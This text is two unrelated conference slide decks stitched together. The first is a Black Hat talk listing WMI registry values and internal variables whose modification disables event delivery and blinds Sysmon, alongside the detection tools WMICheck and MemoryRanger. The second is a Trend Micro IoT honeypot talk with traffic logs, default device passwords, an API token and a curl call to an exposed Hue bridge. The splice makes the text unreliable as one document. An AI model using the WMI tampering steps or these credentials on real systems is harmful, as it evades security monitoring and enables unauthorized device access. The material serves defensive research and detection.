#BHUSA @BlackHatEvents
Information Classification: General
wbemcore.dll
KEY:
HKLM\SOFTWARE\Microsoft\Wbem\CIMOM
Value Name: EnableEvents
Default Data: 1
Attack: change data to 0 and restart WMI
ConfigMgr::InitSystem()
InitSubsystems()
InitESS()
EnsureInitialized()
CreateInstance()
Attacking WMI registry config (1/2)
A new WMI client
#BHUSA @BlackHatEvents
Information Classification: General
wbemcore.dll
Result:
• Event SubSystem (ESS) is disabled
• WMI client cannot receive events
KEY:
HKLM\SOFTWARE\Microsoft\Wbem\CIMOM
Value Name: EnableEvents
Default Data: 1
Attack: change data to 0 and restart WMI
Attacking WMI registry config (2/2)
#BHUSA @BlackHatEvents
Information Classification: General
WMI Infrastructure in the user space
WMI Executable Infrastructure
in the user-mode space
• WMI is implemented by Winmgmt service
running within a SVCHOST process.
• It runs under the "LocalSystem" account.
• It has no self-protection nor integrity check
mechanisms
• It runs without PPL (or trustlet protection)
WinMgmt
(Windows Service)
SvcHost
(Windows Process)
• wbemcore.dll
• repdrvfs.dll
• wbemess.dll
WMI Infrastructure
#BHUSA @BlackHatEvents
Information Classification: General
WMI Infrastructure in the user space
WMI Executable Infrastructure
in the user-mode space
• WMI is implemented by Winmgmt service and
runs in a SVCHOST host process.
• It runs under the "LocalSystem" account.
• It has no self-protection nor integrity check
mechanisms
• It runs without PPL (or trustlet protection)
WinMgmt
(Windows Service)
SvcHost
(Windows Process)
• wmisvc.dll
• wbemcore.dll
• repdrvfs.dll
• wbemess.dll
WMI Infrastructure
#BHUSA @BlackHatEvents
Information Classification: General
Template of all user mode attacks on WMI
#BHUSA @BlackHatEvents
Information Classification: General
Memory
Attacks on WMI data (1/9)
some_wmi.dll
#BHUSA @BlackHatEvents
Information Classification: General
Attacks on WMI data (2/9)
some_wmi.dll
Memory
#BHUSA @BlackHatEvents
Information Classification: General
Attacks on WMI data (3/9)
some_wmi.dll
A new connection
A new event/filter
Memory
#BHUSA @BlackHatEvents
Information Classification: General
Attacks on WMI data (4/9)
some_wmi.dll
A new connection
A new event/filter
Memory
#BHUSA @BlackHatEvents
Information Classification: General
Attacks on WMI data (5/9)
some_wmi.dll
A new connection
A new event/filter
Create a new connection
Register a filter/event
Memory
#BHUSA @BlackHatEvents
Information Classification: General
Attacks on WMI data (6/9)
some_wmi.dll
A new connection
A new event/filter
Clear global_Flag
Attacker’s
App
Memory
#BHUSA @BlackHatEvents
Information Classification: General
Attacks on WMI data (7/9)
some_wmi.dll
A new connection
A new event/filter
Clear global_Flag
Attacker’s
App
Memory
#BHUSA @BlackHatEvents
Information Classification: General
Attacks on WMI data (8/9)
some_wmi.dll
A new connection
A new event/filter
Clear global_Flag
Attacker’s
App
Memory
#BHUSA @BlackHatEvents
Information Classification: General
Patching different
flags lead to different
error codes
Attacks on WMI data (9/9)
WMI Service
Wbemcore.dll
g_bDontAllowNewConnections
EventDelivery
repdrvfs.dll
g_bShuttingDown
g_Glob+0x38
g_Glob+0xBC
g_Glob
g_pEss_m4
m_pEseSession
Attacker’s
App
#BHUSA @BlackHatEvents
Information Classification: General
Attack on
wbemcore!g_bDontAllowNewConnections
#BHUSA @BlackHatEvents
Information Classification: General
wbemcore.dll
Attack on wbemcore!g_bDontAllowNewConnections (1/4)
Attack: change data to TRUE (1)
Module: wbemcore.dll
Variable Name: g_bDontAllowNewConnections
Default Value: FALSE (0)
#BHUSA @BlackHatEvents
Information Classification: General
wbemcore.dll
A new WMI connection
Attack on wbemcore!g_bDontAllowNewConnections (2/4)
Attack: change data to TRUE (1)
Module: wbemcore.dll
Variable Name: g_bDontAllowNewConnections
Default Value: FALSE (0)
#BHUSA @BlackHatEvents
Information Classification: General
wbemcore.dll
Attack on wbemcore!g_bDontAllowNewConnections (3/4)
Result:
• Access to WMI is blocked.
• WMI clients stop receiving new events.
• New WMI clients cannot be started.
• Any attempt to connect to WMI fails with
error code 0x80080008
MessageId: CO_E_SERVER_STOPPING
MessageText: Object server is stopping
when OLE service contacts it
Attack: change data to TRUE (1)
Module: wbemcore.dll
Variable Name: g_bDontAllowNewConnections
Default Value: FALSE (0)
Attacker’s App
#BHUSA @BlackHatEvents
Information Classification: General
Attack on wbemcore!g_bDontAllowNewConnections (4/4)
The online version is here –
https://www.youtube.com/channel/UCpJ_uhTb4_NNoq3-02QfOsA
DEMO: Attack on g_bDontAllowNewConnections
#BHUSA @BlackHatEvents
Information Classification: General
WMICheck –
Advanced Tool for Windows Introspection
#BHUSA @BlackHatEvents
Information Classification: General
WmiCheck helps to reveal that WMI internal variable has been changed
WMICheck: detects attacks on WMI data
• WMICheck console app and kernel driver
• It is only one tool that can retrieve
•
The values of internal WMI objects and fields
•
WMI Provider GUIDs
•
Compare snapshots to check WMI integrity.
• WMICheck is available here https://github.com/binarly-io
WMICHECK BY @REAL_REDP
#BHUSA @BlackHatEvents
Information Classification: General
Attack on wbemcore!g_bDontAllowNewConnections (4/4)
The online version is here –
https://www.youtube.com/channel/UCpJ_uhTb4_NNoq3-02QfOsA
DEMO: Detecting the Attack on
g_bDontAllowNewConnections
#BHUSA @BlackHatEvents
Information Classification: General
Attack on
wbemcore!EventDelivery
#BHUSA @BlackHatEvents
Information Classification: General
wbemcore.dll
Attack: change data to FALSE(0)
Module: wbemcore.dll
Variable Name: EventDelivery (by Redplait)
Debug symbol: CRepository::m_pEseSession+0xC
Default Initialized Value: TRUE (1)
Attack on Wbemcore!EventDelivery (1/3)
#BHUSA @BlackHatEvents
Information Classification: General
wbemcore.dll
Result:
• All intrinsic events are disabled.
• Sysmon stops receiving three event types:
Event ID 19: (WmiEventFilter detected)
Event ID 20: (WmiEventConsumer detected)
Event ID 21: (WmiEventConsumerToFilter
detected)
Attack: change data to FALSE(0)
Module: wbemcore.dll
Variable Name: EventDelivery
Debug symbol: CRepository::m_pEseSession+0xC
Default Initialized Value: TRUE (1)
Attacker’s App
Attack on Wbemcore!EventDelivery (2/3)
#BHUSA @BlackHatEvents
Information Classification: General
Attack on Wbemcore!EventDelivery (3/3)
The online version is here –
https://www.youtube.com/channel/UCpJ_uhTb4_NNoq3-02QfOsA
DEMO: Attack on EventDelivery and its detection
#BHUSA @BlackHatEvents
Information Classification: General
Attack on
repdrvfs!g_bShuttingDown
#BHUSA @BlackHatEvents
Information Classification: General
repdrvfs.dll
Attack: change data to TRUE (1)
Module: repdrvfs.dll
Variable Name: g_bShuttingDown
Default Initialized Value: FALSE (0)
Attack on repdrvfs!g_bShuttingDown (1/2)
#BHUSA @BlackHatEvents
Information Classification: General
Attack on repdrvfs!g_bShuttingDown (2/2)
Result:
• Any new attempt to connect to WMI fails
with error code 0x8004100A
MessageId: WBEM_E_CRITICAL_ERROR
MessageText: Critical Error
• Previously registered callback routines return
error code 0x80041032
MessageId: WBEM_E_CALL_CANCELLED
MessageText: Call Cancelled
repdrvfs.dll
Attack: change data to TRUE (1)
Module: repdrvfs.dll
Variable Name: g_bShuttingDown
Default Initialized Value: FALSE (0)
Attacker’s App
#BHUSA @BlackHatEvents
Information Classification: General
Attack on
repdrvfs!g_Glob+0x0
#BHUSA @BlackHatEvents
Information Classification: General
repdrvfs.dll
Attack: change data to FALSE (0)
Module: repdrvfs.dll
Variable Name: g_Glob+0x0
Default Initialized Value: TRUE (1)
Attack on repdrvfs!g_Glob+0x0 (1/3)
#BHUSA @BlackHatEvents
Information Classification: General
repdrvfs.dll
A new filter
Attack: change data to FALSE (0)
Module: repdrvfs.dll
Variable Name: g_Glob+0x0
Default Initialized Value: TRUE (1)
Attack on repdrvfs!g_Glob+0x0 (2/3)
#BHUSA @BlackHatEvents
Information Classification: General
repdrvfs.dll
Result:
• All attempts to add __EventFilter fail error
code 0x80041014
MessageId:
WBEM_E_INITIALIZATION_FAILURE
Attack on repdrvfs!g_Glob+0x0 (3/3)
Attack: change data to FALSE (0)
Module: repdrvfs.dll
Variable Name: g_Glob+0x0
Default Initialized Value: TRUE (1)
Attacker’s App
#BHUSA @BlackHatEvents
Information Classification: General
Attack on
repdrvfs!g_Glob+0x38
#BHUSA @BlackHatEvents
Information Classification: General
repdrvfs.dll
Attack: change data to 0
Module: repdrvfs.dll
Variable Name: g_Glob+0x38
Default Value: non-Null address of the instance
Attack on repdrvfs!g_Glob+0x38 (1/3)
#BHUSA @BlackHatEvents
Information Classification: General
Attack: change data to 0
Module: repdrvfs.dll
Variable Name: g_Glob+0x38
Default Value: non-Null address of the instance
repdrvfs.dll
A new _EventFilter
Attack on repdrvfs!g_Glob+0x38 (2/3)
#BHUSA @BlackHatEvents
Information Classification: General
repdrvfs.dll
Attack on repdrvfs!g_Glob+0x38 (3/3)
Result:
• All attempts to add __EventFilter fail with
error code 0x80041014
MessageId:
WBEM_E_INITIALIZATION_FAILURE
Attack: change data to 0
Module: repdrvfs.dll
Variable Name: g_Glob+0x38
Default Value: non-Null address of the instance
Attacker’s App
#BHUSA @BlackHatEvents
Information Classification: General
Attack on
repdrvfs!g_Glob+0xBC
#BHUSA @BlackHatEvents
Information Classification: General
repdrvfs.dll
Attack on repdrvfs!g_Glob+0xBC (1/4)
Attack: change data to 0
Module: repdrvfs.dll
Variable Name: g_Glob+0xBC
Default Value: 1
#BHUSA @BlackHatEvents
Information Classification: General
repdrvfs.dll
wbemcore!CWbemLevel1Login::ConnectorLogin
wbemcore!CWbemNamespace::Initialize
repdrvfs!CSession::GetObjectDirect
repdrvfs!CNamespaceHandle::FileToInstance
WMI connection
Attack: change data to 0
Module: repdrvfs.dll
Variable Name: g_Glob+0xBC
Default Value: 1
Attack on repdrvfs!g_Glob+0xBC (2/4)
#BHUSA @BlackHatEvents
Information Classification: General
repdrvfs.dll
Attack: change data to 0
Module: repdrvfs.dll
Variable Name: g_Glob+0xBC
Default Value: 1
Attacker’s App
Attack on repdrvfs!g_Glob+0xBC (3/4)
#BHUSA @BlackHatEvents
Information Classification: General
Attack: change data to 0
Module: repdrvfs.dll
Variable Name: g_Glob+0xBC
Default Value: 1
repdrvfs.dll
Result:
• Client cannot connect to WMI with error
code 0x80041033
MessageId: WBEM_E_SHUTTING_DOWN
MessageText: Shutting Down
• Already connected clients failed to
enumerate WMI with error code 0x80041010
MessageId: WBEM_E_INVALID_CLASS
MessageText: Invalid Class
Attacker’s App
Attack on repdrvfs!g_Glob+0xBC (4/4)
#BHUSA @BlackHatEvents
Information Classification: General
Attack on
wbemcore!_g_pEss_m4
#BHUSA @BlackHatEvents
Information Classification: General
wbemcore.dll
Attack on wbemcore!_g_pEss_m4 (1/3)
Attack: change data to 0
Module: wbemcore.dll
Variable Name: _g_pEss_m4
Default Value: non-Null address of the interface
#BHUSA @BlackHatEvents
Information Classification: General
wbemcore.dll
wbemcore!ConfigMgr::GetEssSink
wbemcore!
CWbemNamespace::_ExecNotificationQueryAsync
Install callback
RPCRT4!Invoke
RPCRT4!LrpcIoComplete
Attack: change data to 0
Module: wbemcore.dll
Variable Name: _g_pEss_m4
Default Value: non-Null address of the interface
Attack on wbemcore!_g_pEss_m4 (2/3)
#BHUSA @BlackHatEvents
Information Classification: General
Result:
• Consumer fails to install callback with error
code 0x8004100C
MessageId: WBEM_E_NOT_SUPPORTED
MessageText: Not Supported
Attack: change data to 0
Module: wbemcore.dll
Variable Name: _g_pEss_m4
Default Value: non-Null address of the interface
wbemcore.dll
Attacker’s App
Attack on wbemcore!_g_pEss_m4 (3/3)
#BHUSA @BlackHatEvents
Information Classification: General
Attack on Wbemcore!EventDelivery (3/3)
The online version is here –
https://www.youtube.com/channel/UCpJ_uhTb4_NNoq3-02QfOsA
DEMO
#BHUSA @BlackHatEvents
Information Classification: General
Sandboxing WMI Service
#BHUSA @BlackHatEvents
Information Classification: General
WMI service interacts with OS, filesystem and registry
Winmgmt Service
(Service Host Process)
File system
Registry
WMI Apps
WMI Apps
WMI Providers\
Clients
ALPC ports
Named pipes
#BHUSA @BlackHatEvents
Information Classification: General
Winmgmt Service
(Service Host Process)
WMI Apps
WMI Apps
WMI Providers\
Clients
ALPC ports
Named pipes
Revoke SeImpersonatePrivilege
The server cannot impersonate the
client
unless
it
holds
the
SeImpersonatePrivilege
privilege.
MSDN: ImpersonateNamedPipeClient
Set Untrusted
Integrity Level
Apps
with
a
Low
Integrity Level cannot
get write access to the
most OS objects
Set Untrusted Integrity
Level
Apps with an Untrusted
Integrity Level
cannot
get write access to the
most OS objects.
File system
Registry
Attacker’s
App
Attack on Process Token results in
WMI Sandboxing
#BHUSA @BlackHatEvents
Information Classification: General
Attack on Process Token results in
WMI Sandboxing
#BHUSA @BlackHatEvents
Information Classification: General
Attack on Process Token results in
WMI Sandboxing
#BHUSA @BlackHatEvents
Information Classification: General
MemoryRanger can prevent DKOM patching of
WMI Token structure
Examples of MemoryRanger customization – https://igorkorkin.blogspot.com/search?q=memoryranger
MemoryRanger source code – https://github.com/IgorKorkin/MemoryRanger
#BHUSA @BlackHatEvents
Information Classification: General
Conclusion
WMI design issues :
Created for performance monitoring and telemetry gathering without security first in mind.
Widely leveraged by various endpoint security solutions.
Architectural weaknesses allow bypassing WMI from various attack vectors - mostly one bit change attack rules all the
security across WMI policies.
WMICheck provides trustworthy runtime checking to detect WMI attacks.
MemoryRanger can prevent sandboxing WMI service by kernel attack.
Conclusion to conclusion: attack vectors on WMI can originate in the firmware
BHUS2022: Breaking Firmware Trust From Pre-EFI: Exploiting Early Boot Phases by Alex Matrosov (CEO Binarly)
#BHUSA @BlackHatEvents
Information Classification: General
Thank you
binarly.io
github.com/binarly-io | pdf |
Max Goncharov, Philippe Lin
2015/8/28-29
Your Lightbulb Is Not Hacking You –
Observation from a Honeypot Backed by Real Devices
1
2
Hit-Point
“ねこあつめ”
$ whoami
• Philippe Lin
• Staff engineer, Trend Micro
• (x) Maker
(o) Cat Feeder
3
$ whoami
• Max Goncharov
• Senior Threat Researcher,
Trend Micro
• (x) Evil Russian Hacker
(o) Ethnical Russian Hacker
4
IoT Devices – Surveillance System
5
IoT Devices – Smart Alarm
6
IoT Devices – Garage Door Controller
7
IoT Devices – Philips hue / WeMo Switch
8
IoT Devices – Door Lock
9
IoT Devices – Thermostat
10
IoT Devices – Wireless HiFi & SmartTV
11
IoT Devices – Game Console
12
IoT Devices – Wireless HDD
13
IoT Devices – Blu-ray Player
14
IoT Devices – IPCam
15
IoT Devices – Kitchenware
16
IoT Devices – Personal Health Devices
17
Yes, IoT is hot and omnipresent …
18
Credit: IBM, iThome and SmartThings.
19
19
Credit:
Apple Daily,
Weird,
net-core
20
Credit: Tom Sachs (2009)
Methodology
• Taipei from March 23 - July 23, 2015
• Munich from April 22 - June 22
• URL / credential randomly pushed on Shodan and Pastebin
• Faked identity, Avatar
– Facebook
– Dyndns
– Skype
– private documents in WDCloud
21
Taipei Lab
22
Block Diagram – Taipei Lab
23
Raspberry Pi 2
114.34.182.36 (PPPoE / HiNet)
192.168.42.11
D-Link D-931L
(80)
192.168.42.12
Philips Hue Bridge
(80, UDP 1900)
192.168.43.52
LIFX WiFi Bulb
(TCP/UDP 56700)
192.168.43.53
Wii U
(X)
192.168.43.54
Google Glass
(X)
wlan0
eth1
eth0
Munich Lab
24
Block Diagram – Munich Lab
25
Banana Pi R1
192.168.186.47
iMAC PowerPC
(22)
192.168.186.45
Samsung SmartTV
UE32H6270
(DMZ)
192.168.43.50
Grundig LIFE P85024
(X)
192.168.43.46
Samsung SmartCam
SNH-P6410BN
(80)
wlan0
eth1
192.168.186.21
AppleTV
(5000, 7000, 62078)
192.168.186.18
WD My Cloud 2TB
(22, 80, 443, Samba)
Munich Lab: Fake D-Link DIR-655
26
http://tomknopf.homeip.net/
Why Backed by Real Devices?
• Shodan knows
• and so do hackers
27
Now, the lousy part ...
28
D-Link DCS-931L IPCAM
• No more “blank” password. Set to 123456.
• My D-Link cloud service
– I failed to enable it.
• Firmware 1.02 vulnerabilities
– CVE 2015-2048 CSRF to hijack authentication
– CVE 2015-2049 Unrestricted file upload to execute
• /video.cgi + admin:123456
• “Peeped” for Only two times. They went to port 8080
directly, without trying port 80.
• Maybe they used Shodan in advance.
29
D-Link DCS-931L IPCAM (2)
142.218.137.94.in-addr.arpa. 3600 IN PTR 94-137-218-142.pppoe.irknet.ru. With a browser
110.199.137.94.in-addr.arpa. 3600 IN PTR 94-137-199-110.pppoe.irknet.ru.
Jun 2, 2015 22:29:28.754491000 CST 94.137.218.142 8457 192.168.42.11 80 HTTP/1.1 GET /aview.htm
Jun 2, 2015 22:29:32.464749000 CST 94.137.218.142 8458 192.168.42.11 80 HTTP/1.1 GET /aview.htm
Jun 2, 2015 22:29:33.393077000 CST 94.137.218.142 8464 192.168.42.11 80 HTTP/1.1 GET /dlink.css?cidx=1.022013-07-15
Jun 2, 2015 22:29:33.399200000 CST 94.137.218.142 8467 192.168.42.11 80 HTTP/1.1 GET /security.gif
Jun 2, 2015 22:29:33.403489000 CST 94.137.218.142 8465 192.168.42.11 80 HTTP/1.1 GET /devmodel.jpg?cidx=DCS-931L
Jun 2, 2015 22:29:33.410560000 CST 94.137.218.142 8463 192.168.42.11 80 HTTP/1.1 GET /function.js?cidx=1.022013-07-
15
Jun 2, 2015 22:29:33.411512000 CST 94.137.218.142 8466 192.168.42.11 80 HTTP/1.1 GET /title.gif
Jun 2, 2015 22:29:35.241203000 CST 94.137.218.142 8471 192.168.42.11 80 HTTP/1.1 GET /favicon.ico
Jun 2, 2015 22:29:35.474530000 CST 94.137.218.142 8474 192.168.42.11 80 HTTP/1.0 GET /dgh264.raw
Jun 2, 2015 22:29:35.495830000 CST 94.137.218.142 8473 192.168.42.11 80 HTTP/1.0 GET /dgaudio.cgi
Jun 2, 2015 22:29:36.470095000 CST 94.137.218.142 8475 192.168.42.11 80 HTTP/1.0 GET /dgh264.raw
Jun 2, 2015 22:29:36.516931000 CST 94.137.218.142 8476 192.168.42.11 80 HTTP/1.0 GET /dgaudio.cgi
Jun 7, 2015 21:23:43.888173000 CST 94.137.199.110 40454 192.168.42.11 80 HTTP/1.1 GET /video.cgi
30
Got attack for TP-Link, but sorry it’s a D-Link ...
(TP-Link Multiple Vuln, CVE-2013-2572, 2573)
Philips Hue
• Hacking Lightbulbs Hue (Dhanjani, 2013)
• MeetHue: Getting Started
• Port 30000 malicious takeover
Hourly traffic
• HTTP/1.0
POST
/DcpRequestHandler/index.ashx
Per bulb per hour
• HTTP/1.0
POST
/DevicePortalICPRequestHandler/RequestHandler.ashx
• HTTP/1.1
POST
/queue/getmessage?duration=180000&…
OTA Firmware update
• HTTP/1.0
GET
/firmware/BSB001/1023599/firmware_rel_cc2530_encrypte
d_stm32_encrypted_01023599_0012.fw
31
Philips Hue (2)
• ZigBee
• Broadcast using UDP port 1900, SSDP
NOTIFY * HTTP/1.1
HOST: 239.255.255.250:1900
CACHE-CONTROL: max-age=100
LOCATION: http://192.168.42.12:80/description.xml
SERVER: FreeRTOS/6.0.5, UPnP/1.0, IpBridge/0.1
NTS: ssdp:alive
NT: upnp:rootdevice
USN: uuid:2f402f80-da50-11e1-9b23-0017881778fd::upnp:rootdevice
• API
curl -X PUT -d '{"on": true}'
http://114.34.182.36:80/api/newdeveloper/groups/0/action
32
Philips Hue (3)
• API user as in official tutorial
curl -X PUT -d '{"on": true}'
http://114.34.182.36:80/api/newdeveloper/groups/0/action
• No one has tried Philips Hue API, even we leaked API of
newdeveloper on Pastebin.
• Three people visited its homepage, and no further actions.
• We forgot to forward port 30000 until June 18.
• For broadcasted UDP port 1900, we have set an iptables rule,
but not sure if it's the right way.
33
LIFX
• Discovery protocol in UDP port 56700
• Controlling stream in TCP port 56700
• Official cloud API: http://developer.lifx.com/
• Current API: 2.0
– Official cloud API: http://developer.lifx.com/
– Official API 2.0 Doc: https://github.com/LIFX/lifx-protocol-docs
• Maintains a keep-alive connection to LIFX cloud API.
• Once get “turn on” from TCP, it broadcasts the message via
UDP to local bulbs.
34
LIFX (2)
$ curl -k -u
"ca8430430f954e1198daa6057a1f9f810d2fffeaa5d12acbcc218
25e859ae5a6:" "https://api.lifx.com/v1beta1/lights/all”
{
"id": "d073d5028d8e",
"uuid": "026da25d-dbd7-4290-8437-09f61f1960cd",
"label": "LIFX Bulb 028d8e",
"connected": true,
"power": "on",
"color": {
"hue": 159.45799954222935,
"saturation": 0.0,
"kelvin": 3000
},
35
LIFX (3)
36
Turn on
Turn off
LIFX (3)
2407 2139.812670 146.148.44.137 -> 192.168.43.52
TCP 123 56700 > 10740 [PSH, ACK] Seq=2419 Ack=2119 Win=20368 Len=69
2408 2139.846425 192.168.43.52 -> 192.168.43.255
UDP 80 Source port: 56700 Destination port: 56700
2409 2139.893891 192.168.43.52 -> 146.148.44.137
TCP 123 10740 > 56700 [PSH, ACK] Seq=2119 Ack=2488 Win=1460 Len=69
2410 2140.061866 146.148.44.137 -> 192.168.43.52
TCP 54 56700 > 10740 [ACK] Seq=2488 Ack=2188 Win=20368 Len=0
• No one has ever tried it.
37
Nintendo Wii U
• Quite safe
• No open port while standing by and playing
• Regular phone-home for OTA
HTTP/1.1
GET
/pushmore/r/8298800e4375f7108b2bf823addaf70d
• So we decided to remove it from research
– Euh, not really.
We removed the device in July.
38
Google Broken (?) Glass
• A noisy source, but mostly /generate_204
• # nmap -sU 192.168.43.54 and it's disconnected from WiFi.
• A lot of opened ports: TCP 8873, TCP 44014, etc.
• Removed from research. Maybe next time.
39
WDCloud 2TB
• Lots of traffic, including ARP broadcasting, SSDP M-SEARCH,
SSDP NOTIFY
• Mostly from embedded Twonky Media Server that pings
iRadio, IPCam in LAN
• SSH, SMB, HTTP
• Beyond what you can expect from a NAS (?)
40
WDCloud 2TB (2)
• Phones home
24 0.936172 192.168.186.18 -> 54.186.91.233 HTTP
GET /rest/nexus/onlineStatus?tsin=WD01 HTTP/1.1
341 12.629990 192.168.186.18 -> 54.186.91.233 HTTP
GET /rest/nexus/registerDevice?ip_internal=192.168.186.18 ...
5337 3302.850595 192.168.186.18 -> 54.68.185.97 HTTP
GET /rest/nexus/ipCheck HTTP/1.1
18195 780.084983 192.168.186.18 -> 129.253.55.203 HTTP
GET /nas/list.asp?devtype=sq&devfw=04.01.03-421&devlang=eng&devsn=&auto=1
HTTP/1.1
164167 1770.338099 192.168.186.18 -> 129.253.8.107 HTTP
GET /api/1.0/rest/remote_access_status/2208751 HTTP/1.1
41
WDCloud 2TB (3)
• Noisy Twonky Media Server
2584 32.926206 192.168.186.18 -> 192.168.186.46 HTTP
GET /rootDesc.xml HTTP/1.1
332562 3489.183064 192.168.186.18 -> 192.168.186.46 HTTP/XML
POST / HTTP/1.1
IPCam returns 500 Internal Server Error when asked to DeletePortMapping, so
WD bothers it every hour
To iRadio (subscribed once)
38907 529.893728 192.168.186.18 -> 192.168.186.50 HTTP
GET /dd.xml HTTP/1.1
38924 529.978422 192.168.186.18 -> 192.168.186.50 HTTP
GET /AVTransport/scpd.xml HTTP/1.1
38956 530.107191 192.168.186.18 -> 192.168.186.50 HTTP
GET /ConnectionManager/scpd.xml HTTP/1.1
38970 530.187170 192.168.186.18 -> 192.168.186.50 HTTP
GET /RenderingControl/scpd.xml HTTP/1.1
42
WDCloud 2TB (4)
• Of course there are kiddie scans...
1176 373.536912 83.197.91.35 -> 192.168.186.18 HTTP
GET /cgi-bin/authLogin.cgi HTTP/1.0
1186 373.698023 83.197.91.35 -> 192.168.186.18 HTTP
GET /cgi-bin/index.cgi HTTP/1.0
• And SMB scans (why don't they list dirs first?)
8036 3452.474672 41.71.142.112 -> 192.168.186.18 SMB
Trans2 Request, GET_DFS_REFERRAL, File: \88.217.9.124\Video
8123 3477.168920 41.71.142.112 -> 192.168.186.18 SMB
Trans2 Request, GET_DFS_REFERRAL, File: \88.217.9.124\TimeMachineBackup
8174 3483.358429 41.71.142.112 -> 192.168.186.18 SMB
Trans2 Request, GET_DFS_REFERRAL, File: \88.217.9.124\SmartWare
8186 3485.339545 41.71.142.112 -> 192.168.186.18 SMB
Trans2 Request, GET_DFS_REFERRAL, File: \88.217.9.124\Public
43
WDCloud 2TB (5)
• Directly from WDC.Com (port_test and returns deviceID)
129317 3094.970315 129.253.8.24 -> 192.168.186.18 HTTP
GET /api/1.0/rest/port_test?format=xml HTTP/1.1
• Phones home (in HTTPS and we didn't MITM)
11159 123.071890 192.168.186.18 -> 129.253.8.107 TCP
57021→443 [ACK] Seq=1302534518 Ack=2477249199 Win=17424 Len=0
• Tons of people trying to guess SSH password
3307 1300.264326 205.185.102.90 -> 192.168.186.18 SSHv2
Client: Key Exchange Init
44
AppleTV
• Port 7000 from Mac
• iphone-sync port 62078
“In a nutshell, a service named lockdownd sits and listens on the iPhone
on port 62078. By connecting to this port and speaking the correct
protocol, it’s possible to spawn a number of different services on an
iPhone or iPad.” (http://www.zdziarski.com/blog/?p=2345)
• 360, Shodan, and unknown source from many countries
scanned port 5000 (not open), 7000, 62078
• No other incoming connections
• Phone home (https://support.apple.com/ja-jp/HT202944)
17.130.254.28 TCP 54 0x9a8d (39565) 49416→443
17.130.254.23 TCP 54 0x9a8d (39565) 49416→5223 iCloud DAV service
45
AppleTV (2)
• 360 (from port 60000, are you China network scanner?)
5216 2529.232297 61.240.144.65 -> 192.168.186.21 TCP
60000→5000 [SYN] Seq=65854669 Win=1024 Len=0
• From Denmark, Netherland, Colocrossing (all from port 7678)
2444 1821.852847 91.224.160.18 -> 192.168.186.21 TCP
7678→5000 [SYN] Seq=1298173523 Win=8192 Len=0 MSS=1452
WS=256 SACK_PERM=1
8816 2941.786677 80.82.78.2 -> 192.168.186.21 TCP
7678→5000 [SYN] Seq=762579296 Win=16384 Len=0
10688 3272.477803 198.23.176.130 -> 192.168.186.21 TCP
7678→5000 [SYN] Seq=2114495098 Win=8192 Len=0 MSS=1452
WS=256 SACK_PERM=1
46
Samsung SmartTV
• Noisy outbound connection
• Shodan and others probe port 22, 80, 443
– https://securityledger.com/2012/12/security-hole-in-samsung-smart-
tvs-could-allow-remote-spying/
– http://thehackernews.com/2015/02/smart-tv-spying.html
• Many incoming connections to port 34363, but the content
is encrypted
– Talk
– Naver
– AuthSMG
– NRDP32
– ...
47
Samsung SmartTV (2)
• Normal outbound
2787 174.504888 192.168.186.45 -> 23.57.87.46 HTTP
GET /global/products/tv/infolink/us.xml HTTP/1.1
2827 174.670619 192.168.186.45 -> 137.116.197.29 HTTP
GET /openapi/timesync?client=TimeAgent/1.0 HTTP/1.1
4693 2578.933492 192.168.186.45 -> 137.116.197.29 HTTP
GET
/openapi/zipcode/timezoneoffset?cc=DE&zip=85399&client=TimeAgent/1.0
HTTP/1.1
• https://infolink.pavv.co.kr/
• https://rmfix.samsungcloudsolution.net/
• http://noticeprd.trafficmanager.net/notice/config?svc_id=HOME&countr
y_code=DE&lang=en
• rd.mch.us1.samsungadhub.com
48
Samsung SmartTV (3)
28440 1149.846158 213.61.179.34 -> 192.168.186.45 HTTP GET / HTTP/1.1
3375 1090.844205 80.68.93.65 -> 192.168.186.45 HTTP GET / HTTP/1.1
6374 2108.239633 188.138.89.16 -> 192.168.186.45 HTTP GET / HTTP/1.1
• netclue.de scans
27331 1000.731556 31.15.66.15 -> 192.168.186.45 TCP 46277→7676 [SYN]
27335 1000.807136 31.15.66.15 -> 192.168.186.45 TCP 36978→4443 [SYN]
27362 1002.788254 31.15.66.15 -> 192.168.186.45 TCP 33607→443 [SYN]
27366 1003.109546 31.15.66.15 -> 192.168.186.45 TCP 55482→6000 [SYN]
27370 1003.135391 31.15.66.15 -> 192.168.186.45 TCP 51068→80 [SYN]
49
Samsung SmartTV (4)
• Weird incoming TCP 34363
18074 469.608644 99.237.147.66 -> 192.168.186.45 50778→34363 [SYN]
Seq=2262400578 Win=8192 Len=0 MSS=1452 WS=256 SACK_PERM=1
50
Samsung SmartCam
• 2013-3964 URI XSS Vulnerability
• Samsung Electronics default password
root/root
admin/4321
• Only script kiddies, no one even tried root/root
51
Samsung SmartCam (2)
• Brainless scanning like
9103 2881.778773 183.60.48.25 -> 192.168.186.46 HTTP
GET http://www.baidu.com/ HTTP/1.1
2086 1310.725002 50.16.184.158 -> 192.168.186.46 HTTP
GET /languages/flags/ptt_bbrr.gif HTTP/1.1
4792 1376.142669 88.217.137.70 -> 192.168.186.46 HTTP
GET /jmx-console HTTP/1.1
• Named probes
1442 925.665117 212.34.129.217 -> 192.168.186.46 HTTP
GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1
52
iMac
• Open ports: SSH
• Several fake documents with personal identities
• Traffic to Apple: upgrades, Apple store
• Port 22 is probed nearly everyday …
– April 24, port 22 probed by 222.184.24.6 (CN)
– April 25, port 22 probed by 80.138.250.177 (DE)
– April 28, 222.186.42.171 (Jiangsu, CN) tried to login, played around for
11.5 mins
– April 29, probed by Shodan :)
– May 16, 45.34.102.240 tried to brute force SSH.
– May 20, 223.94.94.117 tried to brute force SSH.
53
iMac (2)
54
iRadio
• No open ports, so just a decoration
• Gets token from Grundig
• Listens to MPG streaming audio
• Pinged by WDCloud Twonky for UPnP AV DCP
https://technet.microsoft.com/zh-tw/ms890335
• Many zero-lengthed packet to rfe2b-r1.alldigital.net on April
30.
• Otherwise it's very quiet.
19227 179.258446 192.168.186.50 -> 162.249.57.151 TCP
50044→8000 [RST, ACK] Seq=7037960 Ack=2828210800
Win=16384 Len=0
55
Attacks?
• Mostly script kiddies
• Not hacked (so far)
• Only one guy peeped D-Link IPCam, once in 4 months
56
Attacks – Script Kiddies (list)
1. vtigercrm attack (target: Vtiger)
2. Finding Proxy (mostly from China)
3. Linksys (E Series) Router Vulnerability
4. Tomcat manager exploit (CVE-2009-3843)
5. Morpheus Scans
6. Apache Struts (?)
7. Shellshock (?)
8. OpenCart
9. PHPMyAdmin
10. Interesting Romanian Anti-sec
11. Muieblackcat
12. Redhat Jboss
